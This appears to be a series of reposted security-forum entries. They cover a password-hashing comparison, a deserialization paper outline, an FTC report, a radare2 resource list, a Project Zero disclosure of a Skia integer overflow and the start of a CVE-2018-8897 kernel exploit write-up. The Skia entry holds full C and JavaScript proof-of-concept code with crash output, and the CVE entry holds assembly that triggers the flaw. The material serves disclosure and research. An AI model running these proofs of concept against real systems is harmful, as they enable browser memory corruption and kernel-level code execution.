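    """Time one PBKDF2-HMAC-SHA512 derivation for an all-'a' password."""
    pw = b"a" * pw_len
    start = time.perf_counter()
    dk = hashlib.pbkdf2_hmac("sha512", pw, b"salt", rounds)
    assert len(dk) == 64               # SHA-512 output size
    return time.perf_counter() - start

# cost is set by the iteration count; password length barely registers
short_t, long_t = time_pbkdf2(8), time_pbkdf2(4096)
```

Plotting time_pbkdf2 over a range of lengths reproduces the flat lines shown below.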
Using similar Python code with the passlib password hashing library, it was trivial to put together:

PBKDF2-HMAC-SHA512 1-128 characters
PBKDF2-HMAC-SHA512 1-512 characters
PBKDF2-HMAC-SHA512 1-4,096 characters

What this clearly demonstrates is that the only factor driving execution time is the number of iterations you apply to the password before delivering the final password hash. This is what you want to achieve: neither giving a user the opportunity to create a denial-of-service based on password length, nor letting an adversary learn the length of the user's password based on execution time. This is the sort of detail that a cryptographer or cryptography expert would pay attention to, as opposed to an end-developer. It's worth pointing out that PBKDF2-HMAC-SHA512 is the default password hashing function for Mac OS X, with a variable cost between 30,000 and 50,000 iterations (the typical PBKDF2 default is 1,000).

OpenBSD, USENIX, and bcrypt

Because Ulrich Drepper brought up bcrypt, it's worth mentioning in this post. First off, let's get something straight: bcrypt IS NOT Blowfish. While it's true that bcrypt is based on Blowfish, they are two completely different cryptographic primitives. bcrypt is a one-way cryptographic password hashing function, whereas Blowfish is a two-way 64-bit block symmetric cipher.

At the 1999 USENIX conference, Niels Provos and David Mazières, of OpenBSD, introduced bcrypt to the world. They were critical of md5crypt, stating the following (emphasis mine):

MD5 crypt hashes the password and salt in a number of different combinations to slow down the evaluation speed. Some steps in the algorithm make it doubtful that the scheme was designed from a cryptographic point of view--for instance, the binary representation of the password length at some point determines which data is hashed, for every zero bit the first byte of the password and for every set bit the first byte of a previous hash computation.
PHK was slightly offended by their off-handed remark that cryptography was not his core consideration when designing md5crypt. However, Niels Provos was a graduate student in the Computer Science PhD program at the University of Michigan at the time; by August 2003, he had earned his PhD. Since 1999, bcrypt has withstood the test of time. It has been considered "best practice" for hashing passwords, and is still well received today, even though better algorithms exist for hashing passwords. How does bcrypt compare to md5crypt, sha256crypt, and sha512crypt in execution time based on password length?

bcrypt 1-128 characters
bcrypt 1-512 characters
bcrypt 1-4,096 characters

Again, we see consistent execution, driven entirely by iteration cost, not by password length.

Colin Percival, Tarsnap, and scrypt

In May 2009, mathematician Dr. Colin Percival presented at BSDCan'09 a new adaptive password hashing function called scrypt that is not only CPU-expensive, but RAM-expensive as well. The motivation was that even though bcrypt and PBKDF2 are CPU-intensive, FPGAs or ASICs could be built to work through the password hashes much more quickly, because neither requires much RAM: around 4 KB. By adding a memory cost, in addition to a CPU cost, to the password hashing function, we can now require FPGA and ASIC designers to onboard a specific amount of RAM, thus increasing the financial cost of production. scrypt recommends a default RAM cost of at least 16 MB. I like to think of these expensive functions as "security by obesity".

scrypt was initially created as an expensive KDF for Percival's backup service, Tarsnap. Tarsnap generates client-side encryption keys, and encrypts your data on the client, before shipping the encrypted payload off to Tarsnap's servers.
If your client is ever lost or stolen, regenerating the encryption keys requires knowing the password that created them, and attempting to discover that password, just like with typical password hashing functions, should be slow. It's now been 9 years, as of this post, since Dr. Percival introduced scrypt to the world, and like bcrypt, it has withstood the test of time. It has received, and continues to receive, extensive cryptanalysis, is not showing any critical flaws or weaknesses, and as such is among the top recommendations from security professionals for password hashing and key derivation. How does it fare with its execution time per password length?

scrypt 1-128 characters
scrypt 1-512 characters
scrypt 1-4,096 characters

I'm seeing a trend here.

The Password Hashing Competition winner Argon2

In 2013, an open public competition, in the spirit of AES and SHA-3, was held to create a password hashing function that approached password security from what we now know about modern cryptography and password security. There were many interesting designs submitted, including a favorite of mine by Dr. Thomas Pornin, of StackExchange fame and BearSSL, that used delegation to reduce the workload on the honest party while still keeping it expensive for the password cracker. In July 2015, the Argon2 algorithm was chosen as the winner of the competition. It comes with a clean approach to CPU and memory hardness, making the parameters easy to tweak, test, and benchmark. Even though the algorithm is relatively new, it has seen at least 5 years of analysis as of this writing, and has quickly become the "gold standard" for password hashing. I fully recommend it for production use. Any bets on how its execution time will be affected by password length? Let's look:

Argon2 1-128 characters
Argon2 1-512 characters
Argon2 1-4,096 characters

Execution time is not affected by password length. Imagine that.
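Both cost dimensions of a memory-hard function are easy to exercise from Python's standard library. A minimal hashlib.scrypt sketch (the parameter values are my own illustrative choices; n=2**14 with r=8 is what produces the 16 MB memory cost mentioned above):

```python
import hashlib

# n (work factor) and r (block size) together set the RAM cost:
# 128 * r * n bytes = 16 MB for n=2**14, r=8
key = hashlib.scrypt(b"correct horse battery staple",
                     salt=b"a-unique-random-salt",
                     n=2**14, r=8, p=1,
                     maxmem=64 * 1024 * 1024,   # allow the 16 MB working set
                     dklen=32)
assert len(key) == 32
```

Raising n increases both CPU and RAM cost; p adds parallel lanes that scale CPU cost without scaling memory.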
It's as if cryptographers know what they're doing when designing this stuff.

Conclusion

Ulrich Drepper tried creating something more secure than md5crypt, and ended up creating something worse. Don't use sha256crypt or sha512crypt; they're dangerous.

For hashing passwords, in order of preference, use with an appropriate cost:

1. Argon2 or scrypt (CPU and RAM hard)
2. bcrypt or PBKDF2 (CPU hard only)

Avoid practically everything else:

- md5crypt, sha256crypt, and sha512crypt
- Any generic cryptographic hashing function (MD5, SHA-1, SHA-2, SHA-3, BLAKE2, etc.)
- Any complex homebrew iterative design (10,000 iterations of salted SHA-256, etc.)
- Any encryption design (AES, Blowfish (ugh), ChaCha20, etc.)

Acknowledgement

Thanks to Steve Thomas (@Sc00bzT) for our discussions on Twitter, helping me see this quirky behavior with sha256crypt and sha512crypt.

Posted by Aaron Toponce on Wednesday, May 23, 2018, at 6:56 am.

Sursa: https://pthree.org/2018/05/23/do-not-use-sha256crypt-sha512crypt-theyre-dangerous/
  12. Table of Contents

- Serialization (marshaling)
- Deserialization (unmarshaling)
- Programming language support serialization
- Risk for using serialization
- Serialization in Java
- Deserialization vulnerability in Java
- Code flow work
- Vulnerability Detection
- CVE
- Tools
- Vulnerable libraries lead to RCE
- Mitigation
- Serialization in Python
- Deserialization vulnerability in Python
- Pickle instructions
- Exploit vulnerability
- CVE
- Mitigation
- Serialization in PHP
- Deserialization vulnerability in PHP
- Exploit vulnerability
- CVE
- Mitigation
- Serialization in Ruby
- Deserialization vulnerability in Ruby
- Detect and exploit vulnerability
- CVE
- Tools
- Mitigation
- Conclusion

Download: https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf?rss
  13. Mobile Security Updates: Understanding the Issues

A Commission Report, February 2018
FEDERAL TRADE COMMISSION
Maureen K. Ohlhausen, Acting Chairman
Terrell McSweeny, Commissioner

Download: https://www.ftc.gov/system/files/documents/reports/mobile-security-updates-understanding-issues/mobile_security_updates_understanding_the_issues_publication_final.pdf
  14. Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write

Project Member Reported by ifratric@google.com, Feb 28

Issue description

Skia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674
Mozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941

In Skia, SkTDArray stores its length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur:

(1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369
(2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382
(3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383

and possibly others. In addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as fReserve * sizeof(T), sizeof(T) * count, etc. are used.

An integer overflow in (2) above is especially dangerous, as it will cause too little memory to be allocated to hold the array, which will cause an out-of-bounds write when e.g. appending an element.

I have successfully demonstrated the issue by causing an overflow in the fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5), which is used when rendering dashed paths. The PoC requires a lot of memory (my estimate is 16+1 GB for storing the path, plus an additional 16 GB for the SkTDArray we are corrupting); however, there might be less demanding paths for triggering SkTDArray integer overflows.
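To see the class of bug in isolation, here is a small Python model of a signed 32-bit capacity computation wrapping around (the growth formula below is an illustrative stand-in, not Skia's exact code):

```python
def to_int32(x):
    """Wrap a value to a signed 32-bit int, like a C `int` field."""
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x >= 0x80000000 else x

# illustrative capacity growth: new capacity ~ count + count/4 + 4
count = 2_000_000_000
new_reserve = to_int32(count + (count >> 2) + 4)

# the computation wrapped negative: an allocation based on it would be
# far too small, and the subsequent append writes out of bounds
assert new_reserve < 0
```

Python integers don't overflow, so the wrap has to be simulated; in C the same expression silently produces the negative/small value that leads to the undersized allocation.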
PoC program for Skia:

=================================================================
#include <stdio.h>
#include "SkCanvas.h"
#include "SkPath.h"
#include "SkGradientShader.h"
#include "SkBitmap.h"
#include "SkDashPathEffect.h"

int main (int argc, char * const argv[]) {
  SkBitmap bitmap;
  bitmap.allocN32Pixels(500, 500);

  //Create Canvas
  SkCanvas canvas(bitmap);

  SkPaint p;
  p.setAntiAlias(false);
  float intervals[] = { 0, 10e9f };
  p.setStyle(SkPaint::kStroke_Style);
  p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0));

  SkPath path;
  unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668,
                             59838, 557493, 696873, 871098, 4153813, 15845608,
                             48357008, 118059138, 288230353, 360287948,
                             562949933, 703687423, 1099511613, 0};
  path.moveTo(0, 0);
  unsigned numpoints = 1;
  unsigned i = 1;
  unsigned qaindex = 0;
  while(numpoints < 2147483647) {
    if(numpoints == quadraticarr[qaindex]) {
      path.quadTo(i, 0, i, 0);
      qaindex++;
      numpoints += 2;
    } else {
      path.lineTo(i, 0);
      numpoints += 1;
    }
    i++;
    if(i == 1000000) {
      path.moveTo(0, 0);
      numpoints += 1;
      i = 1;
    }
  }
  printf("done building path\n");
  canvas.drawPath(path, p);
  return 0;
}
=================================================================

ASan output:

ASAN:DEADLYSIGNAL
=================================================================
==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0)
    #0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65)
    #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c)
    #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17
    #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21
    #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9
    #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688
    #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14
    #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12
    #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24
    #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18
    #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9
    #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226
    #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9
    #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5
    #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5
    #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
    #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519)
=================================================================

The issue can also be triggered via the web in Mozilla Firefox.

PoC for Mozilla Firefox on Linux (I used a Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer):

=================================================================
<canvas id="canvas" width="64" height="64"></canvas>
<br>
<button onclick="go()">go</button>
<script>
var canvas = document.getElementById("canvas");
var ctx = canvas.getContext("2d");

function go() {
  ctx.beginPath();
  ctx.mozImageSmoothingEnabled = false;
  ctx.webkitImageSmoothingEnabled = false;
  ctx.msImageSmoothingEnabled = false;
  ctx.imageSmoothingEnabled = false;
  linedasharr = [0, 1e+37];
  ctx.setLineDash(linedasharr);
  quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838,
                  557493, 696873, 871098, 4153813, 15845608, 48357008,
                  118059138, 288230353, 360287948, 562949933, 703687423,
                  1099511613];
  ctx.moveTo(0, 0);
  numpoints = 1;
  i = 1;
  qaindex = 0;
  while(numpoints < 2147483647) {
    if(numpoints == quadraticarr[qaindex]) {
      ctx.quadraticCurveTo(i, 0, i, 0);
      qaindex++;
      numpoints += 2;
    } else {
      ctx.lineTo(i, 0);
      numpoints += 1;
    }
    i++;
    if(i == 1000000) {
      ctx.moveTo(0, 0);
      numpoints += 1;
      i = 1;
    }
  }
  alert("done building path");
  ctx.stroke();
  alert("exploit failed");
}
</script>
=================================================================

ASan output:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0)
==37732==The signal is caused by a WRITE memory access.
    #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17
    #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342
    #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15
    #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688
    #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19
    #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12
    #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37
    #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25
    #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15
    #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235
    #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23
    #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12
    #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11
    #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13
    #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13
    #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
    #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14
    #18 0x1a432b56061a (<unknown module>)

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1541
  15. Awesome Radare2

A curated list of awesome projects, articles and other materials powered by Radare2.

What is Radare2?

Radare is a portable reversing framework that can...
- Disassemble (and assemble for) many different architectures
- Debug with local native and remote debuggers (gdb, rap, r2pipe, winedbg, windbg, ...)
- Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku
- Perform forensics on filesystems and data carving
- Be scripted in Python, Javascript, Go and more
- Visualize data structures of several file types
- Patch programs to uncover new features or fix vulnerabilities
- Use powerful analysis capabilities to speed up reversing
- Aid in software exploitation

More info here.

Table of Contents: Books, Videos (Recordings, Asciinemas, Conferences), Slides, Tutorials and Blogs, Tools, Scripts, Contributing

Books
- R2 "Book"
- Radare2 Explorations
- Radare2 wiki

Videos - Recordings
- Creating a keygen for FrogSek KGM#1 - by @binaryheadache
- Radare2 - An Introduction with a simple CrackMe - Part 1 - by @antojosep007
- Introduction To Reverse Engineering With Radare2
- Scripting radare2 with python for dynamic analysis - TUMCTF 2016 Zwiebel part 2

Videos - Asciinemas
- metasploit x86/shikata_ga_nai decoder using r2pipe and ESIL
- Filter for string's searching (urls, emails)
- Manual unpacking UPX on linux 64-bit

Videos - Conferences
- r2con 2017
- LinuxDays 2017 - Disassembling with radare2
- SUE 2017 - Reverse Engineering Embedded ARM Devices
- radare demystified (33c3)
- r2con 2016
- Reversing with Radare2 - OverDrive Conference
- Radare2 & frida hack-a-ton 2015
- Radare from A to Z 2015
- Reverse engineering embedded software using Radare2 - Linux.conf.au 2015
- OggCamp - Shellcode - vext01

Slides and Workshops
- Radare2 cheat-sheet
- r2m2 - radare2 + miasm2 = ♥
- Radare2 Workshop 2015 (Defcon)
- Emulating Code In Radare2
- Radare from A to Z 2015
- Radare2 Workshop 2015 (Hack.lu)
- Radare2 & frida hack-a-ton 2015
- radare2: evolution
- radare2: from forensics to bindiffing

Tutorials and Blogs
- Linux Malware by @MalwareMustDie
- Radare2 - Using Emulation To Unpack Metasploit Encoders - by @xpn
- Reverse engineering a Gameboy ROM with radare2 - by @megabeets_
- radare2 as an alternative to gdb-peda
- How to find offsets for v0rtex (by Siguza)
- Debugging a Forking Server with r2
- Defeating IOLI with radare2 in 2017
- Using r2 to analyse Minidumps
- Android malware analysis with Radare: Dissecting the Triada Trojan
- Solving game2 from the badge of Black Alps 2017 with radare2
- ROPEmporium: Pivot 64-bit CTF Walkthrough With Radare2
- ROPEmporium: Pivot 32-bit CTF Walkthrough With Radare2
- Reversing EVM bytecode with radare2
- Radare2's Visual Mode
- Crackme0x03 Dissected with Radare2
- Crackme0x02 Dissected with Radare2
- Crackme0x01 Dissected with Radare2
- Debugging Using Radare2… and Windows! - by @jacob16682
- Decrypting APT33's Dropshot Malware with Radare2 and Cutter – Part 1 - by @megabeets_
- A journey into Radare 2 – Part 2: Exploitation - by @megabeets_
- A journey into Radare 2 – Part 1: Simple crackme - by @megabeets_
- Reverse Engineering With Radare2 - by @insinuator
- Write-ups from RHME3 pre-qualifications at RADARE2 conference
- Hackover CTF 2016 - tiny_backdoor writeup
- radare2 redux: Single-Step Debug a 64-bit Executable and Shared Object
- Reversing and Exploiting Embedded Devices: The Software Stack (Part 1)
- Binary Bomb with Radare2 - by @binaryheadache
- crackserial_linux with radare2 - by @binaryheadache
- Examining malware with r2 - by @binaryheadache
- Breaking Cerber strings obfuscation with Python and radare2 - by @aaSSfxxx
- Radare2 of the Lost Magic Gadget - by @0xabe_io
- Radare 2 in 0x1E minutes - by @superkojiman
- Exploiting ezhp (pwn200) from PlaidCTF 2014 with radare2
- Baleful was a challenge released in picoctf
- At Gunpoint Hacklu 2014 With Radare2 - by @crowell
- Pwning With Radare2 - by @crowell
- Solving 'heap' from defcon 2014 qualifier with r2 - by @alvaro_fe
- How to radare2 a fake openssh exploit - by jvoisin
- Disassembling 6502 code with Radare – Part I - by @ricardoquesada
- Disassembling 6502 code with Radare – Part II - by @ricardoquesada
- Unpacking shikata-ga-nai by scripting radare2
- This repository contains a collection of documents, scripts and utilities that will allow you to use IDA and R2
- Raspberry PI hang instruction - by @pancake
- Solving avatao's "R3v3rs3 4" - by @sghctoma
- Reverse Engineering With Radare2, Part 1 - by @sam_symons
- Simple crackme with Radare2 - by @futex90
- Pwning With Radare2 - by @crowell
- Reversing the FBI malware's payload (shellcode) with radare2 - by @MalwareMustDie
- ROPping to Victory
- ROPping to Victory - Part 2, split

Tools
- Docker image encapsulates the reverse-engineering framework
- Malfunction - Malware Analysis Tool using Function Level Fuzzy Hashing
- rarop - graphical ROP chain builder using radare2 and r2pipe
- Radare2 and Frida better together
- Android APK analyzer based on radare2

Scripts
- helper radare2 script to analyze UEFI firmware modules
- ThinkPwn Scanner - by @d_olex and @trufae
- radare2-lldb integration
- create a YARA signature for the bytes of the current function
- A radare2 Plugin to perform symbolic execution with a simple macro call (r2 + angr)
- Just a simple radare2 Jupyter kernel
- r2scapy - a radare2 plugin that decodes packets with Scapy
- A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table
- radare2 plugin - converts asm to pseudo-C code (experimental)
- A python script using radare2 for decrypt and patch the strings of GootKit malware
- Collection of scripts for radare2 for MIPS arch
- Extract functions and opcodes with radare2 - by @andrewaeva
- r2-ropstats - a set of tools based on radare2 for analysis of ROP gadgets and payloads
- Patch kextd using radare2
- Python-r2pipe script that draws ascii and graphviz graphs of library dependencies
- Simple XOR DDOS strings deobfuscator - by @NighterMan
- Decode multiple shellcodes encoded with msfencode - by @NighterMan
- Baleful CTF task plugins

Contributing
Please refer to the guidelines at contributing.md for details.
Sursa: https://github.com/dukebarman/awesome-radare2
  16. I don't know how it works on the phone, but under Activity you can configure how your personalized feed looks.
  17. I sometimes post the same way. The point is that those posts are useful. Among @OKQL's posts I have found things I didn't know about, and in general I stay up to date with pretty much everything that comes out.
  18. 1. http://jsbeautifier.org/ 2. Replace eval with alert (for example) 3. http://jsbeautifier.org/ 4. You get eval again. I don't have time for more right now.
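The manual loop above (beautify, swap eval for something that prints, repeat) can be sketched as a script. This is an illustrative helper, not a real deobfuscator: it only rewrites `eval(` so a packer would print its payload instead of executing it; the beautification step itself is left to jsbeautifier.org or a similar tool.

```python
import re

def unwrap_eval(packed_js: str, max_rounds: int = 10) -> str:
    """Swap eval( for console.log( so the packer prints its payload
    instead of running it, mirroring the manual steps above."""
    code = packed_js
    for _ in range(max_rounds):
        replaced, n = re.subn(r'\beval\s*\(', 'console.log(', code)
        if n == 0:
            break  # no eval left to unwrap
        code = replaced
    return code

packed = "eval(function(p,a,c,k,e,d){/* ... */}('payload',62,1,'x'.split('|')))"
print(unwrap_eval(packed))
```

Running the rewritten snippet in a browser console then reveals the next layer, which may again contain an eval to unwrap.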
  19. Arbitrary Code Execution at Ring 0 using CVE-2018-8897

Can Bölük - May 11, 2018

Just a few days ago, a new vulnerability allowing an unprivileged user to run the #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that's exactly what I'm going to attempt doing in this post.

Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by "simulating" this situation. Final source code can be found at the bottom.

0x0: Setting Up the Basics

The fundamentals of this exploit are really simple, unlike its exploitation. When the stack segment is changed (whether via MOV or POP), interrupts are deferred until the next instruction completes. This is not a microcode bug but rather a feature added by Intel so that the stack segment and stack pointer can be set at the same time. However, many OS vendors missed this detail, which lets us raise a #DB exception as if it comes from CPL0 from user-mode.

We can create a deferred-to-CPL0 exception by setting debug registers in such a way that a #DB will be raised during the execution of the stack-segment-changing instruction, and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised. As mentioned by everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted.
All of this can be done in a few lines, as shown below:

#include <Windows.h>
#include <iostream>

void main()
{
    static DWORD g_SavedSS = 0;

    _asm
    {
        mov ax, ss
        mov word ptr [ g_SavedSS ], ax
    }

    CONTEXT Ctx = { 0 };
    Ctx.Dr0 = ( DWORD ) &g_SavedSS;
    Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 );
    Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    SetThreadContext( HANDLE( -2 ), &Ctx );

    PVOID FakeGsBase = ...;

    _asm
    {
        mov eax, FakeGsBase            ; Set eax to fake gs base
        push 0x23
        push X64_End
        push 0x33
        push X64_Start
        retf
    X64_Start:
        __emit 0xf3                    ; wrgsbase eax
        __emit 0x0f
        __emit 0xae
        __emit 0xd8
        retf
    X64_End:
        ; Vulnerability
        mov ss, word ptr [ g_SavedSS ] ; Defer debug exception
        int 3                          ; Execute with interrupts disabled
        nop
    }
}

This example is 32-bit for the sake of showing ASM and C together; the final working code will be 64-bit. Now let's start debugging: we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic; almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let's focus on making GSBASE function like the real one and try to get to KeBugCheckEx.

We can utilize a small IDA script to step to relevant parts faster:

#include <idc.idc>

static main()
{
    Message( "--- Step Till Next GS ---\n" );
    while( 1 )
    {
        auto Disasm = GetDisasmEx( GetEventEa(), 1 );
        if ( strstr( Disasm, "gs:" ) >= Disasm )
            break;
        StepInto();
        GetDebuggerEvent( WFNE_SUSP, -1 );
    }
}

0x1: Fixing the KPCR Data

Here are the few cases where we have to modify the GSBASE contents to pass through successfully:

– KiDebugTrapOrFault

KiDebugTrapOrFault:
...
MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h

Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction, or else it will raise a #GP. So let's set it to its initial value, 0x1F80.
– KiExceptionDispatch

KiExceptionDispatch:
...
MEMORY:FFFFF8018C20DB5F mov rax, gs:188h
MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8

Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h.

– KiDispatchException

KiDispatchException:
...
MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188
MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h]

This is Pcr.Prcb.CurrentThread.ApcStateFill.Process, and again we are going to allocate a block of memory and simply make this pointer point to it.

KeCopyLastBranchInformation:
...
MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20
MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h]

0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let's set Pcr.CurrentPrcb to Pcr + 0x180, and also set Pcr.Self to &Pcr while on it.

